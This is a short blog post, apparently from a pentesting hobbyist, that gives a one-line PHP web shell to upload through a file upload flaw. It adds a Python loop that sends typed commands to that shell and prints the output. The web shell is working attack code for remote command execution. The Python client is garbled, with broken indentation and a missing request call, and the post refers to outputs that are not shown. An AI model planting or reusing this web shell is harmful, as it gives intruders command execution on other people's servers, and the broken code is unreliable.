Simple terminal in python

Suppose you are pentesting a web app and you have found a file upload vulnerability and have successfully uploaded a php file that has this content:

<?php echo shell_exec($_GET['cmd']); ?>

Everytime you need to execute command to find out more about the system that hosts that web app you may need to do something like this:

the result may seem difficult to read?

I am writing a python code which simply throws up results to the terminal, the code looks like this.

import requests

# change your url accordingly to where your <?php echo shell_exec($_GET['cmd']); ?> is uploaded to.
url = ""

    while True:
        cmd = input("> ")
        response =, params={"cmd": cmd})
except KeyboardInterrupt as e:

The result looks like this.

This is not a shell, it is simply the command echo back by php’s shell_exec, instead of displaying in browser it is displayed on terminal.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s